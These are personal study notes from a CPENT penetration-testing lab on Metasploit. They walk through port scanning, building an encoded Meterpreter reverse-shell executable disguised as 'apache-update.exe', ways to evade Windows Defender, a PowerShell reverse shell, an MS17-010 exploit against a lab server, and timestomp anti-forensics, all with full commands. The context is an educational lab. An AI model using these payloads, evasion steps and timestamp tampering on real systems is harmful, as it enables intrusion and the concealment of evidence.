---
tags: 工作用, Pentest, 滲透測試, CPENT
---
# CPENT iLab筆記 - Appendix C - Mastering Metasploit Framework (Expected Duration 50 Minutes)
Appendix C: Mastering Metasploit
## Exercise 1: Exploring the Metasploit Framework
Objectives
In this lab, you will work in Metasploit and explore different features of the tool
Lab Duration: 20 Minutes
1. By default Parrot-Metasploit machine is selected, type toor in the Password field and press Enter.
2. Launch a terminal and type: **cd /usr/share/metasploit-framework** and press Enter.
```bash=
$cd /usr/share/metasploit-framework
```
3. To view the Folder and Files in Metaspolit-Framework folder type: **ls** and press Enter. The shows the structure of the framework.
```bash=
$ls
```
4. Type: **cd tools** and press Enter to access the tools directory. Once you are tools directory type ls and press Enter. The tools folder has different categories that we will continue to explore as we progress through the exercise.
```bash=
$cd tools
````
5. We are ready to start Metasploit. Type: **sudo service postgresql start** and press Enter. Type toor and press Enter.
```bash=
$sudo service postgresql start
```
6. Once **PostgreSQL** running, next we need to create and initialize the msf database. Type: **sudo msfdb init** and press Enter.
Note: Ignore the errors if you receive any.
```bash=
$sudo msfdb init
```
7. Now, type sudo msfconsole and press Enter to launch the framewrok.
```bash=
$sudo msfconsole
```
8. Once the Metasploit tool launches, you should see the banner image as shown in the . The banner rotates. If you want to see another one, you can simply type banner and press Enter.
9. In the msfconsole, type tips and press Enter.
```bash=
>tips
```
10. Next, let us explore the different features and structure of the tool. First, use the port scan module. Type **search portscan/tcp** and press Enter.
```bash=
>search portscan/tcp
```
11. A useful feature that is currently available is that you do not have to type out the module; you can use the # that is referenced. Type use 0 and press Enter.
```bash=
>use 0
```
12. Once you are in the module, type info and press Enter. Always do this when entering a module, namely, review its details. As the shows, a **Transmission Control Protocol** (TCP) connect scan is performed. It has completed the **3-way handshake**, does not need administrative privileges, and is useful for pivoting, all of which are advantages for us. Next, we only need to set the target. The listing has **RHOSTS**, so we use this for a range. In most cases, the RHOST command can still be used when it is one IP address, but since we wish to see this in action on the entire subnet, we will enter it. In our example here, we have more machines running than you might have while completing this lab, but we will only focus on the process and its results.
13. Type set RHOSTS IP Range and press Enter.
```bash=
>set RHOSTS
```
14. Type set PORTS 1-100 and press Enter.
```bash=
>set PORTS 1-100
```
15. Type run and press Enter.
註:這個掃描會用掉很多時間,如果只是為了熟悉操作的練習,執行前請斟酌
```bash=
>run
```
Note: The scan will take minimum of half an hour. You can cut short the scan time by seting a specific port example set PORTS 22.
Note: Run Wireshark as superuser. Observe the results and verify that a connect scan is in fact being performed.
16. Once the scan completes, type: **hosts** and press Enter.
```bash=
>hosts
```
17. Now, type: **services** and press Enter.
```bash=
>services
```
18. As you can see, scanning is somewhat slow. However, if we are using it for pivot purposes, then it might be useful. You can also see that the data have been recorded in the Metasploit database. One way to make the scan quicker is setting the port range. Next, let us explore **payloads**.
19. In the Metasploit console, type: **show payloads** and press Enter. Take a few minutes and review the output of the command. As you can see, there are several payloads within the tool; however, you can use only a few of them.
```bash=
>show payloads
```
20. Next, let us use the connect command. Type: **connect 192.168.177.200 22** and press Enter. You can press Ctrl+C once you reviewed the details.
Note: 192.168.177.200 is the IP address of the Web-Metasploit machine.
```bash=
>connect 192.168.177.200 22
```
21. As we explore the tool more, it will become apparent that there is really no need to exit the console as you have the capability to use many of the tools. We have a variety of **NOPs** as well. Type: **show nops** and press Enter. The output of the command is shown in the .
```bash=
>show nops
```
22. As the shows, several different architectures can be used to generate a NOP sled.
23. Remember that you have the interactive Ruby interpreter as well. Type irb and press Enter. You can press Ctrl+C once you reviewed the details.
24. We will now use the **HTTP** module. Type: **use auxiliary/scanner/http/http_version** and press Enter. Then type info and press Enter.
```bash=
>use auxiliary/scanner/http/http_version
```
25. Now, type: **set RHOSTS 192.168.177.200** and press Enter.
```bash=
>set RHOSTS 192.168.177.200
```
note: 192.168.177.200 is the IP address of the Web-Metasploit machine.
26. Type: **run** and press Enter to exploit the machine.
```bash=
>run
```
27. Now, type: **db_nmap -v -sV 192.168.177.0/24** and press Enter.
```bash=
>db_nmap -v -sV 192.168.177.0/24
```
28. We have seen how **db_nmap** works. We will use the **db_import** command and import results from our nmap scan. Type: **db_import -h** and press Enter. Take a few minutes and review all the different options for import. We can import from multiple places.
```bash=
>db_import -h
```
29. In another terminal, perform another nmap scan. Type: **nmap -sC 192.168.177.0/24 -oX nmapscan.xml**. In this scan, we are scanning the entire subnet and using the output option to write it to an XML file.
```bash=
$nmap -sC 192.168.177.0/24 -oX nmapscan.xml
```
30. Once the scan completes, we will import the results. Switch to msfconsole, type: **db_import [path to the file]** and press Enter. An example of the output from the import is shown in the following .
```bash=
>db_import [path to the file]
>
```
31. Once the import is completed, enter **hosts** followed by **services** as shown in the .
32. We will next look at specific information for a host. Type: **services -c name,info 192.168.177.200** and press Enter.
```bash=
>service -c name,info 192.168.177.200
```
33. We have explored the basics of the Metasploit tool. The lab objectives have been achieved. Close all the windows that were opened.
## Exercise 2: Utilities of the Metasploit Framework
### Objectives
In this lab, you will work in Metasploit and explore different utilities that are available.
1. By default Parrot-Metasploit machine is selected, type toor in the Password field and press Enter.
Note: If you are already logged in skip to step 2.
2. Open a terminal window in Parrot, type: **service postgresql start** and press Enter.
```bash=
$service postgresql start
```
3. In the terminal type: **msfconsole** and press Enter.
4. Open another terminal window, type **cd /usr/share/metasploit-framework/tools** and press Enter.
```bash=
$cd /usr/share/metasploit-framework/tools
```
5. Once you are in the folder, type **ls** and press Enter to list the contents of the directory.
```bash=
$ls
```
6. We are ready now to look at one of the folders. All tools cannot be discussed here as there are too many. Type: **cd exploit** and press Enter.
```bash=
>cd exploit
```
7. Once in the folder, type: **ls** and press Enter.
```bash=
$ls
```
8. Let us take a look at pattern_create. Type **./pattern_create.rb -h** and press Enter.
```bash=
$./pattern_create.rb -h
```
9. We often need to generate patterns, and we can do this within Python or other scripting languages. We can also do this using Metasploit. For this, we use the pattern_create command. Type: **./pattern_create.rb -l 400** and press Enter.
```bash=
$./pattern_create.tb -l 400
```
10. As the in Step 9 shows, we have generated a pattern of 400 characters. We can also specify the character set. Type: **./pattern_create.rb -l 400 -s ABC** and press Enter , then type: **./pattern_create.rb -l 400 -s def** and press Enter.
```bash=
$./pattern_create.rb -l 400 -s ABC
$./pattern_create.rb -l 400 -s def
```
11. As the in **Step 10** shows, this is powerful as it is available in other scripting languages as well.
12. We will now explore different methods of client side exploitation. In reality, there are increasingly fewer opportunities to perform direct attacks on machines. Internal machines are likely to be on a private RFC 1918 address. As such, this network is not routable from the outside, so we cannot get there without help. This again leads to trying to trick a target into clicking on links or other bait that we send them.
13. Certainly, the current challenge is defeating the endpoint protections that are in place. We know that at least Windows Defender will be there, so let us try and see if we can encode an exploit and generate a payload.
14. We will use the built-in tool msfvenom. Type: **msfvenom --list payloads** and press Enter.
```bash=
$msfvenom --list payloads
```
15. As the in Step 14 shows, we can build over 500 payloads.
16. Along with the payloads, we have encoders. Type msfvenom --list encoders and press Enter.
```bash=
$msfvenom --list encoders
```
17. Again, we can see that we have quite a few encoders.
18. More importantly, we need to see what platforms and formats are available. To do this, type: **msfvenom --help platforms** and press Enter.
```bash=
$msfvenom --help platforms
```
19. We are now ready to generate a payload. Type: **msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.177.18 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ~/Desktop/apache-update.exe** and press Enter.
```bash=
$msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.177.18 LPORT=8080 -e x86/shikata_ga_nai -f exe -o ~/Desktop/apache-update.exe
```
20. The explanation for each of the command switches is explained in the following table.
21. Once we have generated the payload, the normal procedure is to check it on **Virus Total**.
22. As we can see, that did not work very well. We need a better method. One of the methods is to encode it multiple times. Therefore, we will encode it 25 times. An example of the results being uploaded to Virus Total is shown in the following .
23. Our objectives were not achieved, but we can attempt to get the code past Windows Defender. We will first try on** Windows Server 2008**, since it is an old machine. There are multiple ways to get the code to the machine, but we will use a simple one, namely, the **Python web server**. Open a terminal window, and type: **cd Desktop** and press Enter.
```bash=
$cd ~/Desktop
```
24. Once you are in the Desktop, type: **python -m SimpleHTTPServer** and press Enter.
```bash=
~Desktop/$python -m SimpleHTTPServer
```
25. Set up an exploit handler in Metasploit. Enter the following command:
a. use exploit/multi/handler
b. set PAYLOAD windows/meterpreter/reverse_tcp
c. set LHOST 192.168.177.18
d. set LPORT 8080
e. run
```bash=
>use exploit/multi/handler
>set PAYLOAD windows/meterpreter/reverse_tcp
>set LHOST 192.168.177.18
>set LPORT 8080
>run
```
26. Next Click 口Server 2008-Metasploit and click Ctrl+Alt+Delete.
27. By default Administrator is selected as username. In the password field type Pa$$w0rd
28. Disable **Windows Defender**. Open a **browser** and enter a connection to Port 8000 on which the server is running, type: **http://192.168.177.18:8000** and press Enter. Download **apache-update.exe** file.
29. Double-click on the file to run it. If the program runs, then you will see that a shell has opened on the machine.
30. Thus, even though all antivirus vendors detected it, we were able to get the 25 encodings past the Windows Server 2008 version of Defender and have the shell on the machine. However, note that this can and does change often.
31. Exit Metasploit and reset the exploit handler. Enter the commands and set up the listener again.
32. Next, we want to try the same code on **Windows Server 2016**. In the machine, disable Windows Defender. Access the web server with the browser and download your executable; then enable Windows Defender and try and run the program.
33. As you will see, the code will fail. Therefore, when we create the encoding, it still does not run in the machine and is stopped by Windows Defender.
34. If you turn off Windows Defender AND uncheck Unblock in Properties, the executable will work. An example of the setting is shown in the following .
35. An example of how it works is shown in the following .
36. The process involves continuing to experiment with different methods. Let us try the latest module that was created to specifically bypass Windows Defender.
37. We now have a module for this evasion. In parrot machine, in the metasploit terminal type: **use evasion/windows/windows_defender_exe** and press Enter.
```bash=
>use evasion/windows/windows_defender_exe
```
38. As we continue, enter **info** to read information about the module.
```bash=
>info
```
39. As you can see in the description, multiple methods are being used to try and evade detection from Windows Defender.
40. Type **show options** and press Enter to review the options.
```bash=
>show options
```
41. As the in **Step 40** shows, a default **FILENAME** is already set for us. Therefore, we can use the tool to try and create the executable. First, we need to enter the following commands:
a. set PAYLOAD windows/meterpreter/reverse_https
b. set LHOST 192.168.177.18
c. run
```bash=
>set PAYLOAD windows/meterpreter/reverse_https
>set LHOST 192.168.177.18
>run
```
The executable will be stored in the Metasploit folder. An example of the output of the command is shown in the following .
42. Navigate to the location of the executable, and copy it to the **Desktop**.
43. Once it is copied, set up the Python web server as we did before and ensure that your Windows Defender is disabled. Once the file is downloaded, set up the exploit handler by entering the following commands in Metasploit:
a. use exploit/multi/handler
b. set LHOST 192.168.177.18
c. set LPORT 443
d. run
```bash=
>use exploit/multi/handler
>set LHOST 192.168.177.18
>set LPORT 443
>run
```
44. Next, switch back to 口 Server 2016-Metasploit and Enable Windows Defender and see whether or not the executable is allowed to run. If it does run, you should see a shell connection into your machine.
45. As you can see, this failed. Turn off Windows Defender to see if we can execute. An example of an attempt to run the executable is shown in the following .
46. Switch back to 口Parrot-Metasploit, to check for the session created.
47. Thus, the special evasion module did not work. This is the challenge with these different endpoint protection methods. They are always changing, and we have to continuously research to see what works. Thus, the best option is to try another method.
48. We could try using PowerShell, but we will first try and use encryption.
49. We can create a payload in a PDF file, and then encrypt it with 7zip to see if it gets detected. The steps are not listed here, but an example of the file after it is uploaded to Virus Total is shown in the following .
50. This does not work 100%. However, only three engines have detected it. Sometimes, we have to accept the wins that we can get.
51. Another option is to create a PowerShell payload, and we can use the Social Engineering Toolkit to aid this in the Parrot machine. Enter **sudo -i**.
```bash=
$sudo -i
```
52. Type: **setoolkit** and press Enter.
```bash=
$setoolkit
```
53. When the tool opens, accept the license agreement if prompted. Select Option **1** followed by Option **9** , followed by option **2** to create PowerShell code.
54. In the **Enter the IPAddress or DNS name for the reverse host**: type **192.168.177.18** and press Enter.
55. In the **Enter the port for listner**: field type **4444** and press Enter
56. In **Do you want to start the listner**: field type: **yes**.
57. Navigate to **/root/.set/reposrts/powershell** and copy the **powershell.reverse.txt** and paste it on Desktop and rename it to **power.ps1**
58. Open an another terminal and type cd Desktop and press Enter, then type: **pythom -m SimpleHTTPServer** and press Enter to start python server.
59. Switch back to 口Server 2016-Metasploit and open a browser and type **http://192.168.177.18:8000** and press Enter and download **power.ps1** file on your Desktop.
60. In **Windows PowerShell**, type **cd Desktop** and press Enter.
61. Now, in **Windows PowerShell** type **.\power.ps1** and press Enter.
62. Again, a vector that we used to have no longer works without prompting the user. This is why we repeatedly emphasize that evasion methods continue to change and cause us problems.
63. Even when we instruct it to run, it still fails; thus, it continues to be a challenge.
64. Additionally, we are using Windows PowerShell 5, and since version 7 has been released, it might pose even more challenges.
65. The lab objectives have been achieved.
## Exercise 3: Working with the Metasploit Framework
### Objectives
In this lab, you will work in Metasploit and explore the tool further
Lab Duration: 20 Minutes
1. By default Parrot-Metasploit machine is selected, type toor in the Password field and press Enter.
note: If you are already logged in skip to step 2.
2. Launch a terminal, type: **msfdb** and press Enter. We do have some options here. When you first install Metasploit, you need to initialize the database.
```bash=
$msfdb
```
3. Type: **sudo service postgresql start** and press Enter. Type **toor** and press Enter.
```bash=
$sudo service postgresql start
```
4. Type: **sudo msfdb init** and press Enter.
```bash=
$sudo msfdb init
```
5. Type: **sudo msfdb status** and press Enter so we can see the status of the service.
```bash=
$sudo msfdb status
```
6. As the above shows, this provides us quite some information and a reference to the configuration file. Open the file in your favorite editor and review the information there. An example of the file is shown in the following .
7. Switch to terminal. Type: **sudo msfdb reinit** and press Enter.
```bash=
$sudo msfdb reinit
```
8. Once the reinit has completed. We can launch and start the **msfdb** at the same time, type: **sudo msfdb run** and press Enter.
```bash=
$sudo msfdb run
```
9. Once the tool runs, type **db_status** and press Enter to see the status of the database.
```bash=
>db_status
```
10. If you are not connected or want to change the connection to your newly created database, then type: **db_connect msfdbconnect: password@127.0.0.1:5432/msfdb** and press Enter.
Note: Replace the password with the password you created for the msfdb user. If you are already connected, then you will get an error requesting you to disconnect first.
```bash=
>db_connect msfdbconnect: password@127.0.0.1:5432/msfdb
```
11. Now that we have our database setup, this will be clean and fresh for our data. As mentioned earlier, this can provide us separation from the other data of other projects. We can now establish workspaces here with respect to our data.
12. We will use the db commands and see how well they work from within Metasploit. Type: **db_nmap -sP 192.168.177.0/24** and press Enter. This will detect our live systems and targets.
```bash=
>db_nmap -sP 192.168.177.0/24
```
13. Next, walk through your normal scanning methodology on Windows Server 2008 machine (口Server 2008-Metasploit).
```bash=
Ports
-sS
Services
-sV
Enumeration
-sC
-A
Vulnerabilities
-Wanna Cry – ms17-010
```
14. In the msfconsole type: **db_nmap -sS 192.168.177.100** and press Enter to perform port scan.
Note: Similarly perform Services, Enumeration, and Vulnerabilty scanning on our target machine.
```bash=
>db_nmap -sS 192.168.177.100
```
15. Since we are only targeting our **Windows Server 2008**, we will not look at the **host** table; we will only enter **services**.
16. You will notice that the **db_nmap** does not run the vulnerability script the same way as the nmap tool does. Therefore, to determine if the target is vulnerable, run the scan using the normal nmap. Launch a new terminal. Type: **sudo nmap -p445 --script smb-vuln-ms17-010 192.168.177.100** and press Enter. Type **toor** and press Enter.
```bash=
$sudo nmap -p445 --script smb-vuln-ms17-010 192.168.177.100
```
17. Now that we know it is vulnerable, switch to msfconsole. Type: **search ms17-010** and press **Enter**.
```bash=
>search ms17-010
```
18. We have one exploit that is ranked great. Let us start with that. Type **use 5** and press **Enter**.
```bash=
>use 5
```
19. Once you are in the exploit, type **info** and press Enter.
```bash=
>info
```
20. Now, type **show options** and press Enter to review the different options for the exploit.
```bash=
>show options
```
21. Two required options are not set, namely, **RHOST** and **LHOST**. Type: **set RHOSTS 192.168.177.100** and press Enter. Type: **set LHOST 192.168.177.18** and press Enter.
```bash=
>set RHOSTS 192.168.177.100
>set LHOSTS 192.168.177.18
```
22. Type **exploit** and press **Enter** to start the exploit. If you do some research, you will discover that the target needs to be infected with DoublePulsar. Let us continue. Despite the ranking of great, we do not have the machine infected.
```bash=
>exploit
```
23. At the time of writing this lab, the most effective exploit against **Windows Server 2008** is number **2**, although it is ranked average. Enter the **search** again, and then enter **use 2** and **info**. The output of these commands is shown in the following .
24. It is not completely successful, but this is true for most methods. Type **show options** and press Enter.
```bash=
>show options
```
25. Here, we need set the RHOSTS. Type: **set RHOSTS 192.168.177.100** and press Enter.
```bash=
>set RHOSTS 192.168.177.100
```
26. Type: **exploit** and press Enter to start the exploit.
```bash=
>exploit
```
27. As long as we see the **WIN**, we are successful!
28. Once you are in the shell, we want to use the execute command and create channels. Type: **execute -h** and press Enter.
```bahs=
>execute -h
```
29. Although we do not explore all of them here in this lab, you are encouraged to explore. Type: **execute -f cmd.exe -c **and press Enter.
-Note how the different parameters are used. The –f parameter is used for setting up an executable command, and the –c operator is used to set up a channelized I/O.
-Next, we can run the execute command again to start another channel without terminating the current channel.
```bash=
>execute -f cmd.exe -c
```
30. We have now created a channel. Let us create two more. Enter: **execute -f notepad.exe -c** and **execute -f mspaint.exe -c**.
```bash=
>execute -f notepad.exe -c
>execute -f mspaint.ext -c
```
31. We now have three different channels running simultaneously on the victim machine. To list the available channels, we can use the channel command. If we want to send some data or write something on a channel, we can use the write command followed by the channel ID we want to write in. Type: **channel -h** and press Enter to see the options.
```bash=
>channel -h
```
32. Type: **channel -l** and press Enter to view the channels list.
```bash=
>channel -l
```
33. Let us now write to a channel. Type **write 1** and press Enter. Follow the instructions and write a message “Hello World, Metasploit was here.”
```bash=
>write 1
```
34. Executing the write command along with the channel ID prompted us to enter our data followed by a **dot**. We successfully wrote to the channel. We can read from the channel using the read command. Type **read 1** and press Enter. This will read from **channel 2**.
35. Since we wrote to a command prompt, our message did not work as a command. To background a channel, use Ctrl + Z. We can easily switch between channels by using the channel command. In order to end a channel, we can use the channel command followed by -c and the channel ID.
36. This demonstrates the power of using multiple channels. It also shows how easy it is to manage them simultaneously and switch between different channels. Using channels becomes important when we are running multiple services on the target machine. Metasploit tags each message with a separate channel ID, which helps it in identifying the channel context in which the particular command should be executed.
37. The communication process in Meterpreter follows the **TLV** protocol, which imparts the flexibility of tagging different messages with specific channel IDs in order to provide multichannel communication support.
- TLV – (Time, Length, Value) protocol for data transfer. The major advantage of using TLV is that it allows tagging of data with specific channel numbers, thus allowing multiple programs running on the victim to communicate with Meterpreter on the attacking machine. This facilitates setting up several communication channels simultaneously.
38. Finally, we look at the timestomp command. Meterpreter has an anti-forensics capability. The timestomp tool changes the Modified, Accessed, Created entry attributes of a file, sometimes referred to as MACE.
39. We use the technique of changing the MACE values to make the target user think that the file has been present on the system for a long time and that it has not been touched or modified. In case of suspicious activity, the administrators may check for recently modified files to find out whether any of the files have been modified or accessed. By using this technique, the file will not appear in the list of recently accessed or modified items. Even though there are other techniques to discover if the file attributes have been modified, this technique is nevertheless handy.
40. On the 口Server 2008-Metasploit machine, create a file and save it as **C:\flag.txt**. Once the file is created, open the **Properties** of the file.
41. Switch to 口Parrot-Metasploit machine. Using the **timestomp** command, we are going to attempt to change these values. In the Meterpreter shell, type command as shown in the and press Enter.
42. This shows us the current data with respect to MACE.
43. Let us now attempt to change this. Type command as shown in the and press Enter.
44. The –c operator is used to change the creation time of the file. Similarly, we can use the –m and –a operators to change the modified and last accessed attributes of the file, respectively.
45. Once the attributes have been changed, we can use the –v operator again to check and verify whether or not we have successfully executed the commands. Let us continue and check the file attributes again. Type the command as shown in the and press Enter.
46. Success! The date does work; the time is not perfect but is close. We have successfully modified the MACE attributes of the file. Now this file can be easily hidden from the list of recently modified or recently accessed files.
47. We only changed the one attribute, but the –z option would change them all. However, the –z operator will assign the same values to all four MACE attributes, which is practically not possible. There has to be some time difference between the creation and accessed time. Therefore, the use of the –z operator should be avoided. Metasploit created a group of tools called the Metasploit Anti-Forensic Investigation Arsenal (MAFIA) as part of its research projects, but the anti-forensics project was discontinued, so their usage is limited at best.
48. One other thing to be aware of is the capability to customize the timeout in Meterpreter. Type: **get_timeouts** and press Enter.
49. Session Expiry specifies the timeout period assigned to the session, after which the session will be terminated. If network-related issues are preventing data from being transmitted between the two endpoints but do not cause the socket to completely disconnect, the Comm Timeout command allows to specify how long Meterpreter will wait for communication before disconnecting or trying to reconnect, which by default is 5 minutes. Retry Total Time is the total amount of time that Meterpreter will attempt to retry communication on the transport back to Metasploit, which by default is set to 3600 seconds (1 hour). Retry Wait Time refers to the waiting period before trying to establish connectivity.
50. Using the set_timeouts command, we can change the current timeout configuration. To change Comm Timeout, we can use the -c flag followed by the time in seconds.
Sign in with Wallet
Connect another wallet